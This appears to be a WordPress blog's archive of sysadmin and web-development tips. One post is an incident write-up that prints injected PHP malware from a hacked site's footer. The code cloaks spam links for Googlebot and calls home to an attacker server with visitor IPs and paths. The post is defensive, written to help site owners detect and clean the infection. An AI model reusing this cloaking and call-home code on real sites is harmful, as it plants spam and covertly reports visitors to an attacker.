Thesis 1.8.4 Upgrade – style.css

I was recently upgrading a Thesis-based site from Thesis 1.8 to 1.8.4 and noticed that every time I activated the theme, the site’s style was completely wrong. I checked the HTML generated by both versions, and 1.8 was requesting the Thesis style.css but 1.8.4 was not. Upon looking at the code, I found that in 1.8.4 when the design options are saved, Thesis copies the contents of style.css to custom/layout.css.

Solution: Once you have activated Thesis 1.8.4, simply go to the design options panel and click the big ass save button. This will run the Thesis code that copies the style.css rules into custom/layout.css – your design should now look as before.

Converting DOS to UNIX newlines

Annoying as it may be, Windows and some FTP clients insert “carriage return” characters into text files. This is commonly referred to as “DOS” mode – you’ll know you’re editing a DOS mode file if your editor tells you so, or (like I found this morning) git tells you. I downloaded a bunch of files I had passed to a client, and git told me they had all been changed – they simply had carriage return (\r or ^M) characters inserted. Meh.

You can convert files with the

fromdos

command, which is located in the

tofrodos

package. Doing this recursively is pretty easy as well:


ewiltshi@davinci$ find . -type f | xargs fromdos

The above pattern is very useful –

find . -type f

just finds all files from the current directory and all subdirectories. The output of this then gets piped to

xargs fromdos

which runs the

fromdos

command on the found files. If you only wanted to run it on .css files, you could just change it up like so:


ewiltshi@davinci$ find . -type f -name "*.php" | xargs fromdos

Google Instant with FireWatir

I’ve been playing around with FireWatir, which allows you to write ruby scripts that control a Firefox web browser. This has obvious white hat uses, such as automated testing for sites that use JavaScript. It also has black hat uses for things like automated account creation and article directory submitters.

The most basic example is searching Google for something, and the code looks like this:


ff = FireWatir::Firefox.new
ff.goto('http://www.google.com/ncr')
ff.text_field(:name => 'q').set('yoda')
ff.button(:name, 'btnG').click

The problem is Google instant – after FireWatir types the first character, Google instant executes some AJAX which interferes with FireWatir. I found I would only get the first character typed. If you’re not running Firefox in “porn mode” you can disable Instant and your settings will be saved in a cookie. If you have Firefox configured not to save cookies, this is a problem. Here’s a solution that is somewhat of a kludge, but it works:


ff = FireWatir::Firefox.new
ff.goto('http://www.google.com/ncr')
ff.text_field(:name => 'q').set('y')
sleep 0.3
ff.text_field(:name => 'q').set('yoda')
ff.button(:name, 'btnG').click

The difference here is we only set the first character in the text field, then pause the script giving Instant time to update. Then proceed with the rest of the code.

WordPress Twitter API Plugins not authenticating

A friend asked me to investigate why he was unable to use any Twitter plugins with his blog, but only on a specific server. After Googling around a little, I saw solutions that ranged from disabling PHP’s oauth module, to updating server time. It turns out that none of these fixed the problem – the issue was lack of SSL support for Curl.

His server is running cPanel, and although Curl support was enabled, the Twitter API calls all use HTTPS. The fix was to use EasyApache, and check the box next to curlssl as well as curl. A recompile of Apache and PHP, and boom. The plugin started working. It would be really great if the plugin would mention lack of SSL support in curl, rather than dying with a generic “Couldn’t authenticate” message. There was nothing in the PHP error log.

symfony caching – cross-application cache clearing

I’m writing a webapp that has an api application, and a frontend application. The frontend supports caching, since it’s providing RSS feeds that might be read quite frequently, and don’t change often. The currently timeout is set to 12 hours. The API allows the user to change aspects of the RSS feeds that will change the contents of the feed so much that it could be totally different, and 12 hours is too long for the user to wait.

What I needed to do was clear the frontend cache, but from within the API application. I found this post that described how to do it in symfony 1.2, and it works just great in 1.4! Here’s the post: clearing symfony cache for another application.

Here’s the code snippet that I ended up using:

// Save any changes, if any were made, and clear the frontend RSS cache for
// this feed.
if ($changes == true)
{
$wc->save();
// Clear cache, if it's turned on.
sfContext::switchTo('frontend'); //switch to the environment you wish to clear
sfContext::getInstance()->getViewCacheManager()->remove('static/rss?id=' . $wc->getId());
sfContext::switchTo('api'); //switch back to the environment you started from
}

Link building exploit that only google can see

I was called by a client today who had looked at her site in Google’s cache and was shocked to see spam links for penis pills. When she viewed her site, however, there were no links to be seen. Thinking the hosting provider had fixed the issue, I looked at the most recently-cached item, which was only a few hours old, and saw that the links were still there. The database was clean, and no modified files in the document root or theme.

I assumed that the exploit was still live, but wasn’t showing anything to my browser, so it might be using user-agent cloaking. I tried switching my user-agent to GoogleBot, and still no dice. Then I decided to grep the entire codebase for “USER_AGENT” and see if anything hit. Lo and behold:

$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot

Huh. That seemed odd, so I investigated further and found this:


function get_footer( $name = null ) {
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create bot analitics
$stCurlHandle = curl_init(URL_REMOVED?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']));
} else
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create bot analitics
$stCurlHandle = curl_init(URL_REMOVED?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']));
}
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
$sResult = curl_exec($stCurlHandle);
curl_close($stCurlHandle);
echo $sResult; // Statistic code end

I compared this to a clean WordPress install and all the “statistics” code was missing. It’s pretty clear this is injected code, and is checking both the user-agent string AND the source IP address, which is why I couldn’t see the links even when I set my user-agent string to Googlebot’s. Smart. And, the script “calls home” to check the IP, so not only does the attacker have the ability to change cloaked IP blocks easily (and without having to re-upload a script) but they have a record of which sites have been successfully attacked.

The question of how the injected code was introduced was the next challenge. I ran a UNIX find query and found yet another file that contained the above. It also contained code to inject itself into PHPNuke, VBulletin, and Joomla in addition to WordPress. The injection code also includes a cleanup function, which was not invoked by this particular attacker. I found the file at: ./wp-includes/js/tinymce/plugins/plugin.php on my install.

After checking the FTP logs, I discovered someone from a Belize-based IP address had uploaded the above file and executed the script to inject the code. Cleanup was a matter of changing the FTP password, checking for extra WordPress accounts, and re-installing WordPress from a fresh install. I’m not certain how the attacker got my client’s FTP password, so I asked her to scan her PC and all her current employee’s PCs and gave her the new password over the phone rather than email.

If you’ve looked in Google’s cache and are seeing pharmaceutical links in the footer (that you didn’t put there!), or are noticing that Webmaster Tools is saying your site is about viagra, you may have the above problem. You can verify by looking for the above code snippet. If you are a victim, change your hosting credentials, scan your PC, and install from a fresh copy of WordPress.

Must-have plugins for anyWordPress install

One of the things that makes WordPress so great is the fact that you can extend it, without touching the core, through the use of plugins. Here is the list of must-have plugins that I put on every blog I deploy, and why:

  • All In One SEO Pack – allows you to set custom titles, and meta descriptions very easily.
  • Sociable – adds social bookmarking icons to your posts.
  • NextGEN Gallery – this is an amazing image plugin. Not only does it allow upload of zip archives to create galleries, but the templates to display galleries are easily customized.
  • Viper’s Video Quicktags – for sites that require video embeds tags, I like this plugin the best. The shortcodes are simple to use and automate.
  • Google XML Sitemaps Generator – XML sitemap and robots.txt generator. This is a definite must-have that should be installed before a site even goes live.
  • Redirection Plugin – used for moving sites from one domain to another. Allows you to set up 301 redirects from your old posts to your new ones quite easily, which gets your new site indexed more quickly. Be warned that this plugin can cause interference with other plugins. If your site starts acting strangely, I recommend disabling the redirection plugin and adding static 301s to your .htaccess instead.
  • Google Analytics – if you’re using Google Analytics, I like this plugin.

As a final note, this method for generating SEO friendly permalinks is good, and I’ve used it on several sites.

symfony and cPanel “couldn’t locate driver named mysql”

I was experiencing this earlier today on a cPanel install to which I had deployed a symfony application. The solution was to install the PDO_MYSQL Pecl module. Here’s how you do it:

  1. Log in as root to your cPanel install
  2. Under the Software menu on the left, click “Module Installers”
  3. Click Manage, next to the PHP Pecl item
  4. Search for “PDO” using the search
  5. Click “Install” in the PDO_MYSQL row
  6. Clear your symfony cache, and away you go!

PCI Compliance And Back Ports

I was recently hired to do a PCI compliance scan and complete the remedial work to bring it up to standard. This was on a CentOS5 box. The tool I was using to do the scanning was pretty good, but like all scanning tools plays “the numbers game.” This means it simply looks at the versions of certain services and flags it if that version is known to be vulnerable. In my case, Apache and PHP were causing the most red flags. There were some XSS (cross-site scripting) vulnerabilities addressed in Apache 2.2.8 and my server header was showing 2.2.3. PHP was the same story, with several DoS and code execution vulnerabilities fixed in 5.2.7, and I was apparently running 5.2.6. Obviously vulnerable, right? No and yes. I’ll explain why this is the case, and how you can tell what you’re really vulnerable to.

Linux distributions such as Red Hat (RHEL, Fedora, CentOS) sometimes rely on “back ports” or patching the existing version of the service, fixing the hole without updating the version number. This means a lot of false positives on the scan, which you can clear up with the rpm tool, grep and a web browser. Let’s start with Apache – the scanner says I am running 2.2.3, which is obviously vulnerable to some cross-site scripting (XSS) attacks. Being vulnerable to XSS is a PCI compliance fail. So I checked out the changelog for Apache 2.2 and saw that CVE-2008-2939 was fixed in version 2.2.10. We then run:

[root@steve ~]# rpm -q --changelog httpd | grep CVE-2008-2939
- add security fixes for CVE-2008-2364, CVE-2008-2939 (#468840)

This shows that someone from RedHat applied the patch to fix this vulnerability, but the version number wasn’t updated. This is a clear false positive. If you don’t find the CVE number listed in the changelog, pipe the output to less and look for anything mentioning the affected module or an upgrade to a version that includes the fix. For example, in my case, PHP 5.2.7 fixed a bunch of security problems in prior versions, some of which are a PCI fail.

When I looked through the PHP rpm changelog, the last thing I found was the update to 5.2.6 with no mention of 5.2.7 or patches for the issues addressed. Checking out the PHP changelog showed a lot of security fixes for 5.2.7. I ended up using a PHP 5.2.8 rpm from atomicrocketturtle.com which included the fixes. Using a third-party repository isn’t particularly ideal, but given the choice between that and either building from source or applying patches to a source rpm, I picked the third-party.

A few final thoughts:

  • You may find it easier to disable a module or service than patch it. If a module or service isn’t required, then disable it. This is good security practice.
  • For those services that are only required locally, such as database and mail services, bind them to the localhost interface and firewall them.
  • Don’t put all your faith in automated scanning – they are a tool, not an absolute solution. You will need to go through the results yourself, or hire someone to help you.

If you’re looking to hire someone to set up a PCI compliant LAMP stack or audit an existing one, please contact me for an estimate.

External DNS at 1and1

If you have your DNS hosted in one place (say DNS Made Easy) but host your content on 1and1.com. 1and1 allows you to do this without transferring the domain to them. The problem is they appear to not set the DirectoryIndex directive for hosts using external DNS. This can be overcome with either creating or adding to the .htaccess file in your site’s root directory:

DirectoryIndex index.php

That’ll work for WordPress, or most other PHP-based sites. You can always change it to index.html if that’s what your site’s index page is.

WORDPRESS